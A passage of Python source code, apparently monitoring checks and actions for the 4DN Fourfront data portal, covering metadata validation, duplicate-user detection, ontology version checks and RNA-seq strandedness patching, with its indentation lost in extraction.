newsearch = '{server}/search/?q=date_created:[{date} TO *]&type={itype}&lab.uuid={lab}&submitted_by.uuid={sub}&status=in review by lab'.format(
server=connection.ff_server, date=searchdate, itype=itype, lab=labuuid, sub=item_info.get('submitted_by.uuid')
)
full_output[submitter][labname][itype][newlabel] = {'search': newsearch}
full_output[submitter][labname][itype][newlabel].setdefault('accessions', []).append(item_info['accession'])
if modifier:
brief_output.setdefault(modifier, {}).setdefault(labname, {}).setdefault(itype, {})
full_output.setdefault(modifier, {}).setdefault(labname, {}).setdefault(itype, {})
for label, date in label2date.items():
modlabel = 'Modified ' + label
brief_output[modifier][labname][itype].setdefault(modlabel, 0)
full_output[modifier][labname][itype].setdefault(modlabel, 'None')
if modified > date:
warn = True
# modlabel = 'Modified ' + label
# brief_output[modifier][labname][itype].setdefault(modlabel, 0)
brief_output[modifier][labname][itype][modlabel] += 1
# full_output[modifier][labname][itype].setdefault(modlabel, {'search': '', 'accessions': []})
if full_output[modifier][labname][itype][modlabel] == 'None' or not full_output[modifier][labname][itype][modlabel].get('search'):
searchdate, _ = date.split('T')
modsearch = ('{server}search/?q=last_modified.date_modified:[{date} TO *]'
'&type={itype}&lab.uuid={lab}&last_modified.modified_by.uuid={mod}&status=in review by lab').format(
server=connection.ff_server, date=searchdate, itype=itype, lab=labuuid, mod=item_info.get('last_modified.modified_by.uuid')
)
full_output[modifier][labname][itype][modlabel] = {'search': modsearch}
full_output[modifier][labname][itype][modlabel].setdefault('accessions', []).append(item_info['accession'])
check.brief_output.update(brief_output)
check.full_output.update(full_output)
if warn is True:
check.status = 'WARN'
check.summary = 'In review Experiments or ExperimentSets submitted or modified'
description = "Experiments or ExperimentSets with status='in review by lab' have been submitted or modified by non-DCIC users since last reset or in the past %d days." % days_since
check.description = description
else:
check.status = 'PASS'
check.summary = 'No newly submitted or modified Experiments or ExperimentSets since last reset'
return check
@check_function()
def clean_up_webdev_wfrs(connection, **kwargs):
def patch_wfr_and_log(wfr, full_output):
uuid = wfr['uuid']
patch_json = {'uuid': uuid, 'status': 'deleted'}
# no need to patch again
if uuid in full_output['success']:
return
try:
ff_utils.patch_metadata(patch_json, uuid, key=connection.ff_keys)
except Exception as exc:
# log something about str(exc)
full_output['failure'].append('%s. %s' % (uuid, str(exc)))
else:
# successful patch
full_output['success'].append(uuid)
check = CheckResult(connection, 'clean_up_webdev_wfrs')
check.full_output = {'success': [], 'failure': []}
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# input for test pseudo hi-c-processing-bam
response = ff_utils.get_metadata('68f38e45-8c66-41e2-99ab-b0b2fcd20d45',
key=connection.ff_keys)
wfrlist = response['workflow_run_inputs']
for entry in wfrlist:
patch_wfr_and_log(entry, check.full_output)
wfrlist = response['workflow_run_outputs']
for entry in wfrlist:
patch_wfr_and_log(entry, check.full_output)
# input for test md5 and bwa-mem
response = ff_utils.get_metadata('f4864029-a8ad-4bb8-93e7-5108f462ccaa',
key=connection.ff_keys)
wfrlist = response['workflow_run_inputs']
for entry in wfrlist:
patch_wfr_and_log(entry, check.full_output)
if check.full_output['failure']:
check.status = 'WARN'
check.summary = 'One or more WFR patches failed'
else:
check.status = 'PASS'
if check.full_output['success']:
check.summary = 'All WFR patches successful'
else:
check.summary = 'No WFR patches run'
return check
@check_function()
def validate_entrez_geneids(connection, **kwargs):
''' query ncbi to see if geneids are valid
'''
check = CheckResult(connection, 'validate_entrez_geneids')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
problems = {}
timeouts = 0
search_query = 'search/?type=Gene&limit=all&field=geneid'
genes = ff_utils.search_metadata(search_query, key=connection.ff_keys)
if not genes:
check.status = "FAIL"
check.description = "Could not retrieve gene records from fourfront"
return check
geneids = [g.get('geneid') for g in genes]
query = "https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=gene&id={id}"
for gid in geneids:
if timeouts > 5:
check.status = "FAIL"
check.description = "Too many ncbi timeouts. Maybe they're down."
return check
gquery = query.format(id=gid)
# make 3 attempts to query gene at ncbi
for count in range(3):
resp = requests.get(gquery)
if resp.status_code == 200:
break
if resp.status_code == 429:
time.sleep(0.334)
continue
if count == 2:
timeouts += 1
problems[gid] = 'ncbi timeout'
try:
rtxt = resp.text
except AttributeError:
problems[gid] = 'empty response'
else:
if rtxt.startswith('Error'):
problems[gid] = 'not a valid geneid'
if problems:
check.summary = "{} problematic entrez gene ids.".format(len(problems))
check.brief_output = problems
check.description = "Problematic Gene IDs found"
check.status = "WARN"
else:
check.status = "PASS"
check.description = "GENE IDs are all valid"
return check
@check_function(scope='all')
def users_with_pending_lab(connection, **kwargs):
"""Define comma seperated emails in scope
if you want to work on a subset of all the results"""
check = CheckResult(connection, 'users_with_pending_lab')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
check.action = 'finalize_user_pending_labs'
check.full_output = []
check.status = 'PASS'
cached_items = {} # store labs/PIs for performance
mismatch_users = []
# do not look for deleted/replaced users
scope = kwargs.get('scope')
search_q = '/search/?type=User&pending_lab!=No+value&frame=object'
# want to see all results or a subset defined by the scope
if scope == 'all':
pass
else:
emails = [mail.strip() for mail in scope.split(',')]
for an_email in emails:
search_q += '&email=' + an_email
search_res = ff_utils.search_metadata(search_q, key=connection.ff_keys)
for res in search_res:
user_fields = ['uuid', 'email', 'pending_lab', 'lab', 'title', 'job_title']
user_append = {k: res.get(k) for k in user_fields}
check.full_output.append(user_append)
# Fail if we have a pending lab and lab that do not match
if user_append['lab'] and user_append['pending_lab'] != user_append['lab']:
check.status = 'FAIL'
mismatch_users.append(user_append['uuid'])
continue
# cache the lab and PI contact info
if user_append['pending_lab'] not in cached_items:
to_cache = {}
pending_meta = ff_utils.get_metadata(user_append['pending_lab'], key=connection.ff_keys,
add_on='frame=object')
to_cache['lab_title'] = pending_meta['display_title']
if 'pi' in pending_meta:
pi_meta = ff_utils.get_metadata(pending_meta['pi'], key=connection.ff_keys,
add_on='frame=object')
to_cache['lab_PI_email'] = pi_meta['email']
to_cache['lab_PI_title'] = pi_meta['title']
to_cache['lab_PI_viewing_groups'] = pi_meta['viewing_groups']
cached_items[user_append['pending_lab']] = to_cache
# now use the cache to fill fields
for lab_field in ['lab_title', 'lab_PI_email', 'lab_PI_title', 'lab_PI_viewing_groups']:
user_append[lab_field] = cached_items[user_append['pending_lab']].get(lab_field)
if check.full_output:
check.summary = 'Users found with pending_lab.'
if check.status == 'PASS':
check.status = 'WARN'
check.description = check.summary + ' Run the action to add lab and remove pending_lab'
check.allow_action = True
check.action_message = 'Will attempt to patch lab and remove pending_lab for %s users' % len(check.full_output)
if check.status == 'FAIL':
check.summary += '. Mismatches found for pending_lab and existing lab'
check.description = check.summary + '. Resolve conflicts for mismatching users before running action. See brief_output'
check.brief_output = mismatch_users
else:
check.summary = 'No users found with pending_lab'
return check
@action_function()
def finalize_user_pending_labs(connection, **kwargs):
action = ActionResult(connection, 'finalize_user_pending_labs')
check_res = action.get_associated_check_result(kwargs)
action_logs = {'patch_failure': [], 'patch_success': []}
for user in check_res.get('full_output', []):
patch_data = {'lab': user['pending_lab']}
if user.get('lab_PI_viewing_groups'):
patch_data['viewing_groups'] = user['lab_PI_viewing_groups']
# patch lab and delete pending_lab in one request
try:
ff_utils.patch_metadata(patch_data, obj_id=user['uuid'], key=connection.ff_keys,
add_on='delete_fields=pending_lab')
except Exception as e:
action_logs['patch_failure'].append({user['uuid']: str(e)})
else:
action_logs['patch_success'].append(user['uuid'])
action.status = 'DONE'
action.output = action_logs
return action
def get_tokens_to_string(s):
""" divides a (potentially) multi-word string into tokens - splitting on whitespace or hyphens
(important for hyphenated names) and lower-casing them;
returns a single joined string of tokens
"""
tokens = [t.lower() for t in re.split(r'[\s-]', s) if t]
return ''.join(tokens)
def string_label_similarity(string1, string2):
""" compares concantenate token strings for similarity
simple tokenization - return a score between
0-1
"""
s1cmp = get_tokens_to_string(string1)
s2cmp = get_tokens_to_string(string2)
return SequenceMatcher(None, s1cmp, s2cmp).ratio()
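# e.g. string_label_similarity('Jon Smith', 'Jon-Smith') -> 1.0 (identical after tokenization);
# the check below treats a rounded score above 85/100 as a possible duplicate.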
@check_function(emails=None, ignore_current=False, reset_ignore=False)
def users_with_doppelganger(connection, **kwargs):
""" Find users that share emails or have very similar names
Args:
emails: comma separated emails to run the check on, e.g. when you want to limit the check to certain users
ignore_current: if there are accepted catches, put their emails in 'emails' and set ignore_current
to true; they will not show up next time. Use this for caught cases that are not actually problematic.
reset_ignore: resets the ignore list and starts fresh, useful if something was added by mistake
Result:
full_output : contains two lists, one for problematic cases, and the other one for results to skip (ignore list)
"""
check = CheckResult(connection, 'users_with_doppelganger')
check.description = 'Reports duplicate users, and number of items they created (user1/user2)'
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# do we want to add current results to ignore list
ignore_current = False
if kwargs.get('ignore_current'):
ignore_current = True
# do we want to reset the ignore list
reset = False
if kwargs.get('reset_ignore'):
reset = True
# GET THE IGNORE LIST FROM LAST CHECKS IF NOT RESET_IGNORE
if reset:
ignored_cases = []
else:
last_result = check.get_primary_result()
# if the last run errored or was not a primary check, look for an earlier usable result
it = 0
while last_result['status'] == 'ERROR' or not last_result['kwargs'].get('primary'):
it += 1
# this is a daily check, so look for checks with 12h iteration
hours = it * 12
last_result = check.get_closest_result(diff_hours=hours)
# if this is going forever kill it
if hours > 100:
err_msg = 'Cannot find a non-ERROR primary check in the last 100 hours'
check.brief_output = err_msg
check.full_output = {}
check.status = 'ERROR'
return check
# remove cases previously ignored
ignored_cases = last_result['full_output'].get('ignore', [])
# ignore contains nested list with 2 elements, 2 user @id values that should be ignored
check.full_output = {'result': [], 'ignore': []}
check.brief_output = []
check.status = 'PASS'
query = ('/search/?type=User&sort=display_title'
'&field=display_title&field=contact_email&field=preferred_email&field=email')
# if check was limited to certain emails
if kwargs.get('emails'):
emails = kwargs['emails'].split(',')
for an_email in emails:
an_email = an_email.strip()
if an_email:
query += '&email=' + an_email.strip()
# get users
all_users = ff_utils.search_metadata(query, key=connection.ff_keys)
# combine all emails for each user
for a_user in all_users:
mail_fields = ['email', 'contact_email', 'preferred_email']
user_mails = []
for f in mail_fields:
if a_user.get(f):
user_mails.append(a_user[f].lower())
a_user['all_mails'] = list(set(user_mails))
# go through each combination
combs = itertools.combinations(all_users, 2)
cases = []
for comb in combs:
us1 = comb[0]
us2 = comb[1]
# is there a common email between the 2 users
common_mail = list(set(us1['all_mails']) & set(us2['all_mails']))
if common_mail:
msg = '{} and {} share mail(s) {}'.format(
us1['display_title'],
us2['display_title'],
str(common_mail))
log = {'user1': [us1['display_title'], us1['@id'], us1['email']],
'user2': [us2['display_title'], us2['@id'], us2['email']],
'log': 'has shared email(s) {}'.format(str(common_mail)),
'brief': msg}
cases.append(log)
# if not, compare names
else:
score = round(string_label_similarity(us1['display_title'], us2['display_title']) * 100)
if score > 85:
msg = '{} and {} are similar-{}'.format(
us1['display_title'],
us2['display_title'],
str(score))
log = {'user1': [us1['display_title'], us1['@id'], us1['email']],
'user2': [us2['display_title'], us2['@id'], us2['email']],
'log': 'has similar names ({}/100)'.format(str(score)),
'brief': msg}
cases.append(log)
# are the ignored ones getting out of control
if len(ignored_cases) > 100:
fail_msg = 'Number of ignored cases is very high, time for maintenance'
check.brief_output = fail_msg
check.full_output = {'result': [fail_msg, ], 'ignore': ignored_cases}
check.status = 'FAIL'
return check
# remove ignored cases from all cases
if ignored_cases:
for an_ignored_case in ignored_cases:
cases = [i for i in cases if i['user1'] not in an_ignored_case and i['user2'] not in an_ignored_case]
# if ignore_current, add cases to ignored ones
if ignore_current:
for a_case in cases:
ignored_cases.append([a_case['user1'], a_case['user2']])
cases = []
# add the number of items referencing each user (uuid extracted from the '/users/<uuid>/' @id)
if cases:
for a_case in cases:
us1_info = ff_utils.get_metadata('indexing-info?uuid=' + a_case['user1'][1][7:-1], key=connection.ff_keys)
item_count_1 = len(us1_info['uuids_invalidated'])
us2_info = ff_utils.get_metadata('indexing-info?uuid=' + a_case['user2'][1][7:-1], key=connection.ff_keys)
item_count_2 = len(us2_info['uuids_invalidated'])
add_on = ' ({}/{})'.format(item_count_1, item_count_2)
a_case['log'] = a_case['log'] + add_on
a_case['brief'] = a_case['brief'] + add_on
check.full_output = {'result': cases, 'ignore': ignored_cases}
if cases:
check.summary = 'Some user accounts need attention.'
check.brief_output = [i['brief'] for i in cases]
check.status = 'WARN'
else:
check.summary = 'No user account conflicts'
check.brief_output = []
return check
@check_function()
def check_assay_classification_short_names(connection, **kwargs):
check = CheckResult(connection, 'check_assay_classification_short_names')
check.action = 'patch_assay_subclass_short'
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
subclass_dict = {
"replication timing": "Replication timing",
"proximity to cellular component": "Proximity-seq",
"dna binding": "DNA binding",
"open chromatin": "Open Chromatin",
"open chromatin - single cell": "Open Chromatin",
"dna-dna pairwise interactions": "Hi-C",
"dna-dna pairwise interactions - single cell": "Hi-C (single cell)",
"dna-dna multi-way interactions": "Hi-C (multi-contact)",
"dna-dna multi-way interactions of selected loci": "3/4/5-C (multi-contact)",
"dna-dna pairwise interactions of enriched regions": "IP-based 3C",
"dna-dna pairwise interactions of selected loci": "3/4/5-C",
"ligation-free 3c": "Ligation-free 3C",
"transcription": "Transcription",
"transcription - single cell": "Transcription",
"rna-dna pairwise interactions": "RNA-DNA HiC",
"fixed sample dna localization": "DNA FISH",
"chromatin tracing": "DNA FISH",
"fixed sample rna localization": "RNA FISH",
"single particle tracking": "SPT",
"context-dependent reporter expression": "Reporter Expression",
"scanning electron microscopy": "SEM",
"transmission electron microscopy": "TEM",
"immunofluorescence": "Immunofluorescence",
"synthetic condensation": "OptoDroplet",
"capture hi-c": "Enrichment Hi-C"
}
exptypes = ff_utils.search_metadata('search/?type=ExperimentType&frame=object',
key=connection.ff_keys)
auto_patch = {}
manual = {}
for exptype in exptypes:
value = ''
if exptype.get('assay_classification', '').lower() in subclass_dict:
value = subclass_dict[exptype['assay_classification'].lower()]
elif exptype.get('title', '').lower() in subclass_dict:
value = subclass_dict[exptype['title'].lower()]
elif exptype.get('assay_subclassification', '').lower() in subclass_dict:
value = subclass_dict[exptype['assay_subclassification'].lower()]
else:
manual[exptype['@id']] = {
'classification': exptype['assay_classification'],
'subclassification': exptype['assay_subclassification'],
'current subclass_short': exptype.get('assay_subclass_short'),
'new subclass_short': 'N/A - Attention needed'
}
if value and exptype.get('assay_subclass_short') != value:
auto_patch[exptype['@id']] = {
'classification': exptype['assay_classification'],
'subclassification': exptype['assay_subclassification'],
'current subclass_short': exptype.get('assay_subclass_short'),
'new subclass_short': value
}
check.allow_action = True
check.full_output = {'Manual patching needed': manual, 'Patch by action': auto_patch}
check.brief_output = {'Manual patching needed': list(manual.keys()), 'Patch by action': list(auto_patch.keys())}
if auto_patch or manual:
check.status = 'WARN'
check.summary = 'Experiment Type classifications need patching'
check.description = '{} experiment types need assay_subclass_short patched'.format(
len(manual.keys()) + len(auto_patch.keys())
)
if manual:
check.summary += ' - some manual patching needed'
else:
check.status = 'PASS'
check.summary = 'Experiment Type classifications all set'
check.description = 'No experiment types need assay_subclass_short patched'
return check
@action_function()
def patch_assay_subclass_short(connection, **kwargs):
action = ActionResult(connection, 'patch_assay_subclass_short')
check_res = action.get_associated_check_result(kwargs)
action_logs = {'patch_success': [], 'patch_failure': []}
for k, v in check_res['full_output']['Patch by action'].items():
try:
ff_utils.patch_metadata({'assay_subclass_short': v['new subclass_short']}, k, key=connection.ff_keys)
except Exception as e:
action_logs['patch_failure'].append({k: str(e)})
else:
action_logs['patch_success'].append(k)
if action_logs['patch_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
def semver2int(semver):
v = semver.lstrip('v').split('.')
for i in range(1, len(v)):
if len(v[i]) == 1:
v[i] = '0' + v[i]
return float(''.join([v[0] + '.'] + v[1:]))
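# Worked example (illustrative): semver2int('v1.2.3') pads single-digit parts and returns float('1.0203');
# thus 'v1.10.0' -> 1.10 sorts above 'v1.9.0' -> 1.09, which a plain string comparison would get wrong.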
@check_function()
def check_for_ontology_updates(connection, **kwargs):
'''
Checks for updates in one of the three main ontologies that the 4DN data portal uses:
EFO, UBERON, and OBI.
EFO: checks github repo for new releases and compares release tag. Release tag is a
semantic version number starting with 'v'.
OBI: checks github repo for new releases and compares release tag. Release tag is a 'v'
plus the release date.
UBERON: github site doesn't have official 'releases' (and website isn't properly updated),
so checks for commits that have a commit message containing 'new release'
If version numbers to compare against aren't specified in the UI, it will use the ones
from the previous primary check result.
'''
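# The 'latest' values compared below are parsed from the owl headers and look roughly like
# (illustrative values only): a semantic version such as 'v3.44.0' for EFO (compared via semver2int)
# and a release date such as '2022-06-30' for the others (compared as strings).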
check = CheckResult(connection, 'check_for_ontology_updates')
check.summary = ''
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
ontologies = ff_utils.search_metadata(
'search/?type=Ontology&frame=object',
key=connection.ff_keys
)
ontologies = [o for o in ontologies if o['ontology_prefix'] != '4DN']
versions = {
o['ontology_prefix']: {
'current': o.get('current_ontology_version'),
'needs_update': False
} for o in ontologies
}
for o in ontologies:
owl = None
if o['ontology_prefix'] == 'UBERON':
# UBERON needs different URL for version info
owl = requests.get('http://purl.obolibrary.org/obo/uberon.owl', headers={"Range": "bytes=0-2000"})
elif o.get('download_url'):
# instead of repos etc, check download url for ontology header to get version
owl = requests.get(o['download_url'], headers={"Range": "bytes=0-2000"})
if owl is not None and owl.status_code == 404:
versions[o['ontology_prefix']]['latest'] = 'WARN: 404 at download_url'
check.summary = 'Problem 404 at download_url'
check.description = 'One or more ontologies has a download_url with a 404 error.'
check.description += ' Please update ontology item or try again later.'
check.status = 'WARN'
continue
elif owl is None or not owl.ok:
# no owl was fetched, or the request failed with something other than a 404
versions[o['ontology_prefix']]['latest'] = 'WARN: no owl returned at request'
check.summary = 'Problem with ontology request - nothing returned'
check.description = 'One or more ontologies has nothing returned from attempted request.'
check.description += ' Please update ontology item or try again later.'
check.status = 'WARN'
continue
if 'versionIRI' in owl.text:
idx = owl.text.index('versionIRI')
vline = owl.text[idx:idx+150]
if 'releases' in vline:
vline = vline.split('/')
v = vline[vline.index('releases')+1]
versions[o['ontology_prefix']]['latest'] = v
continue
else:
# looks for date string in versionIRI line
match = re.search('(20)?([0-9]{2})-[0-9]{2}-(20)?[0-9]{2}', vline)
if match:
v = match.group()
versions[o['ontology_prefix']]['latest'] = v
continue
# SO removed version info from versionIRI, use date field instead
if 'oboInOwl:date' in owl.text:
idx = owl.text.index('>', owl.text.index('oboInOwl:date'))
vline = owl.text[idx+1:owl.text.index('<', idx)]
v = vline.split()[0]
versions[o['ontology_prefix']]['latest'] = datetime.datetime.strptime(v, '%d:%m:%Y').strftime('%Y-%m-%d')
check.brief_output = []
for k, v in versions.items():
if v.get('latest') and '404' in v['latest']:
check.brief_output.append('{} - 404'.format(k))
elif not v['current']:
v['needs_update'] = True
check.brief_output.append('{} needs update'.format(k))
elif k == 'EFO' and semver2int(v['latest']) > semver2int(v['current']):
v['needs_update'] = True
check.brief_output.append('{} needs update'.format(k))
elif k != 'EFO' and v['latest'] > v['current']:
v['needs_update'] = True
check.brief_output.append('{} needs update'.format(k))
else:
check.brief_output.append('{} OK'.format(k))
check.full_output = versions
num = ''.join(check.brief_output).count('update')
if 'Problem' not in check.summary:
if num:
check.summary = 'Ontology updates available'
check.description = '{} ontologies need update'.format(num)
check.status = 'WARN'
else:
check.summary = 'Ontologies up-to-date'
check.description = 'No ontology updates needed'
check.status = 'PASS'
# if the only ontology needing an update is SO, keep the check as PASS
if num == 1 and versions['SO']['needs_update']:
check.status = 'PASS'
return check
@check_function()
def states_files_without_higlass_defaults(connection, **kwargs):
check = CheckResult(connection, 'states_files_without_higlass_defaults')
check.action = 'patch_states_files_higlass_defaults'
check.full_output = {'to_add': {}, 'problematic_files': {}}
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
query = '/search/?file_type=chromatin states&type=File'
res = ff_utils.search_metadata(query, key=connection.ff_keys)
for a_res in res:
if not a_res.get('higlass_defaults'):
if not a_res.get('tags'):
check.full_output['problematic_files'][a_res['accession']] = 'missing state tag'
else:
check.full_output['to_add'][a_res['accession']] = a_res["tags"]
if check.full_output['to_add']:
check.status = 'WARN'
check.summary = 'Ready to patch higlass_defaults'
check.description = 'Ready to patch higlass_defaults'
check.allow_action = True
check.action_message = 'Will patch higlass_defaults to %s items' % (len(check.full_output['to_add']))
elif check.full_output['problematic_files']:
check.status = 'WARN'
check.summary = 'There are some files without states tags'
else:
check.status = 'PASS'
check.summary = 'higlass_defaults are all set'
return check
@action_function()
def patch_states_files_higlass_defaults(connection, **kwargs):
action = ActionResult(connection, 'patch_states_files_higlass_defaults')
check_res = action.get_associated_check_result(kwargs)
action_logs = {'patch_success': [], 'patch_failure': [], 'missing_ref_file': []}
total_patches = check_res['full_output']['to_add']
s3 = boto3.resource('s3')
bucket = s3.Bucket('elasticbeanstalk-%s-files' % prod_bucket_env_for_app())
query = '/search/?type=FileReference'
all_ref_files = ff_utils.search_metadata(query, key=connection.ff_keys)
ref_files_tags = {}
for ref_file in all_ref_files:
if ref_file.get('tags'):
for ref_file_tag in ref_file.get('tags'):
if 'states' in ref_file_tag:
ref_files_tags[ref_file_tag] = {'uuid': ref_file['uuid'], 'accession': ref_file['accession']}
for item, tag in total_patches.items():
if ref_files_tags.get(tag[0]):
buck_obj = ref_files_tags[tag[0]]['uuid'] + '/' + ref_files_tags[tag[0]]['accession'] + '.txt'
obj = bucket.Object(buck_obj)
body = obj.get()['Body'].read().decode('utf8')
lines = body.split()
# take the odd-indexed tokens (every second value) from the reference file as the color scale
states_colors = [item for num, item in enumerate(lines) if num % 2 != 0]
patch = {'higlass_defaults': {'colorScale': states_colors}}
try:
ff_utils.patch_metadata(patch, item, key=connection.ff_keys)
except Exception as e:
action_logs['patch_failure'].append({item: str(e)})
else:
action_logs['patch_success'].append(item)
else:
action_logs['missing_ref_file'].append({item: 'missing rows_info reference file'})
if action_logs['patch_failure'] or action_logs['missing_ref_file']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
@check_function()
def check_for_strandedness_consistency(connection, **kwargs):
check = CheckResult(connection, 'check_for_strandedness_consistency')
check.action = 'patch_strandedness_consistency_info'
check.full_output = {'to_patch': {}, 'problematic': {}}
check.brief_output = []
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# Build the query (RNA-seq experiments for now)
query = '/search/?experiment_type.display_title=RNA-seq&type=ExperimentSeq'
# The search
res = ff_utils.search_metadata(query, key=connection.ff_keys)
# experiments that need to be patched
missing_consistent_tag = []
problematic = {'fastqs_zero_count_both_strands': [], 'fastqs_unmatch_strandedness': [], 'inconsistent_strandedness': []}
target_experiments = [] # the experiments that we are interested in (fastqs with beta actin count tag)
# Filter down to the target experiments
for a_res in res:
if a_res.get("strandedness"):
strandedness_meta = a_res['strandedness']
else:
strandedness_meta = 'missing'
exp_info = {'meta': a_res, 'files': [], 'tag': strandedness_meta}
# verify that the files in the experiment have the beta-actin count info
ready = False
for a_re_file in a_res['files']:
if a_re_file['file_format']['display_title'] == 'fastq':
file_meta = ff_utils.get_metadata(a_re_file['accession'], connection.ff_keys)
file_meta_keys = file_meta.keys()
if 'beta_actin_sense_count' in file_meta_keys and 'beta_actin_antisense_count' in file_meta_keys:
ready = True
if file_meta.get('related_files'):
paired = True
else:
paired = False
file_info = {'accession': file_meta['accession'],
'sense_count': file_meta['beta_actin_sense_count'],
'antisense_count': file_meta['beta_actin_antisense_count'],
'paired': paired}
exp_info['files'].append(file_info)
else:
ready = False
if ready:
target_experiments.append(exp_info)
# Calculate whether the beta-actin counts are consistent with the strandedness assignment in the metadata.
if target_experiments:
problm = False
for target_exp in target_experiments:
if target_exp['meta'].get('tags'):
tags = target_exp['meta']['tags']
else:
tags = []
if 'strandedness_verified' not in tags:
# Calculate forward, reversed or unstranded
strandedness_report = wrangler_utils.calculate_rna_strandedness(target_exp['files'])
if "unknown" in strandedness_report['calculated_strandedness']:
problematic['fastqs_unmatch_strandedness'].append({'exp': target_exp['meta']['accession'],
'strandedness_info': strandedness_report})
problm = True
elif strandedness_report['calculated_strandedness'] == "zero":
problematic['fastqs_zero_count_both_strands'].append({'exp': target_exp['meta']['accession'],
'strandedness_info': strandedness_report})
problm = True
elif target_exp['tag'] != strandedness_report['calculated_strandedness']:
problematic['inconsistent_strandedness'].append({'exp': target_exp['meta']['accession'],
'strandedness_metadata': target_exp['tag'],
'calculated_strandedness': strandedness_report['calculated_strandedness'],
'files': strandedness_report['files']})
problm = True
else:
missing_consistent_tag.append(target_exp['meta']['accession'])
problm = True
if problm:
check.status = 'WARN'
check.description = 'Problematic experiments need to be addressed'
msg = str(len(missing_consistent_tag) + len(problematic['fastqs_unmatch_strandedness']) + len(problematic['fastqs_zero_count_both_strands']) +
len(problematic['inconsistent_strandedness'])) + ' experiment(s) need to be addressed'
check.brief_output.append(msg)
if problematic['fastqs_zero_count_both_strands']:
check.full_output['problematic']['fastqs_zero_count_both_strands'] = problematic['fastqs_zero_count_both_strands']
if problematic['fastqs_unmatch_strandedness']:
check.full_output['problematic']['fastqs_unmatch_strandedness'] = problematic['fastqs_unmatch_strandedness']
if problematic['inconsistent_strandedness']:
check.full_output['problematic']['inconsistent_strandedness'] = problematic['inconsistent_strandedness']
if missing_consistent_tag:
check.full_output['to_patch']['strandedness_verified'] = missing_consistent_tag
check.summary = 'Some experiments are missing verified strandedness tag'
check.allow_action = True
check.description = 'Ready to patch verified strandedness tag'
else:
check.status = 'PASS'
check.summary = 'All good!'
return check
@action_function()
def patch_strandedness_consistency_info(connection, **kwargs):
"""Start rna_strandness runs by sending compiled input_json to run_workflow endpoint"""
action = ActionResult(connection, 'patch_strandedness_consistency_info')
check_res = action.get_associated_check_result(kwargs)
action_logs = {'patch_success': [], 'patch_failure': []}
total_patches = check_res['full_output']['to_patch']
for key, item in total_patches.items():
for i in item:
tags = {'tags': []}
meta = ff_utils.get_metadata(i, key=connection.ff_keys)
if meta.get('tags'):
tags['tags'] = [tg for tg in meta['tags']]
tags['tags'].append(key)
else:
tags = {'tags': [key]}
try:
ff_utils.patch_metadata(tags, i, key=connection.ff_keys)
except Exception as e:
action_logs['patch_failure'].append({i: str(e)})
else:
action_logs['patch_success'].append(i)
if action_logs['patch_failure']:
action.status = 'FAIL'
else:
action.status = 'DONE'
action.output = action_logs
return action
@check_function()
def check_suggested_enum_values(connection, **kwargs):
"""On our schemas we have have a list of suggested fields for
suggested_enum tagged fields. A value that is not listed in this list
can be accepted, and with this check we will find all values for
each suggested enum field that is not in this list.
There are 2 functions below:
- find_suggested_enum
This function takes the properties for an item type (taken from /profiles/)
and goes field by field looking for suggested enum lists; it recurses
to take care of sub-embedded objects (tagged as type=object).
It also collects ignored enum lists (values which are not
suggested, but are ignored in the subsequent search).
* after running this function, we construct a search url for each field,
where we exclude all values listed under suggested_enum (and ignored_enum)
from the search: i.e. if it was FileProcessed field 'my_field' with options
[val1, val2], url would be:
/search/?type=FileProcessed&my_field!=val1&my_field!=val2&my_field!=No value
- extract_value
Once we have the search result for a field, we dissect it
(again for sub-embedded items or lists) to extract the field value, and
count occurrences of each new value (i.e. val3:10, val4:15).
*deleted items are not considered by this check
"""
check = CheckResult(connection, 'check_suggested_enum_values')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# must set this to be the function name of the action
check.action = "add_suggested_enum_values"
def find_suggested_enum(properties, parent='', is_submember=False):
"""Filter schema propteries for fields with suggested enums.
This functions takes properties for a item type (taken from /profiles/)
and goes field by field, looks for suggested enum lists, and is also
recursive for taking care of sub-embedded objects (tagged as
type=object). It also looks fore ignored enum lists.
"""
def is_subobject(field):
if field.get('type') == 'object':
return True
try:
return field['items']['type'] == 'object'
except:
return False
def dotted_field_name(field_name, parent_name=None):
if parent_name:
return "%s.%s" % (parent_name, field_name)
else:
return field_name
def get_field_type(field):
field_type = field.get('type', '')
if field_type == 'string':
if field.get('linkTo', ''):
return "Item:" + field.get('linkTo')
# if multiple objects are linked by "anyOf"
if field.get('anyOf', ''):
links = list(filter(None, [d.get('linkTo', '') for d in field.get('anyOf')]))
if links:
return "Item:" + ' or '.join(links)
# if not object return string
return 'string'
elif field_type == 'array':
return 'array of ' + get_field_type(field.get('items'))
return field_type
fields = []
for name, props in properties.items():
options = []
# focus on suggested_enum ones
if 'suggested_enum' not in str(props):
continue
# skip calculated
if props.get('calculatedProperty'):
continue
is_array = False
if is_subobject(props) and name != 'attachment':
is_array = get_field_type(props).startswith('array')
obj_props = {}
if is_array:
obj_props = props['items']['properties']
else:
obj_props = props['properties']
fields.extend(find_suggested_enum(obj_props, name, is_array))
else:
field_name = dotted_field_name(name, parent)
field_type = get_field_type(props)
# check props here
if 'suggested_enum' in props:
options = props['suggested_enum']
if 'ignored_enum' in props:
options.extend(props['ignored_enum'])
# if array of string with enum
if is_submember or field_type.startswith('array'):
sub_props = props.get('items', '')
if 'suggested_enum' in sub_props:
options = sub_props['suggested_enum']
if 'ignored_enum' in sub_props:
options.extend(sub_props['ignored_enum'])
fields.append((field_name, options))
return(fields)
def extract_value(field_name, item, options=None):
"""Given a json, find the values for a given field.
Once we have the search result for a field, we dissect it
(again for sub-embedded items or lists) to extract the field value(s)
"""
# also exclude empty values; copy options so the caller's list is not mutated
options = list(options or []) + ['']
new_vals = []
if '.' in field_name:
part1, part2 = field_name.split('.')
val1 = item.get(part1)
if isinstance(val1, list):
for an_item in val1:
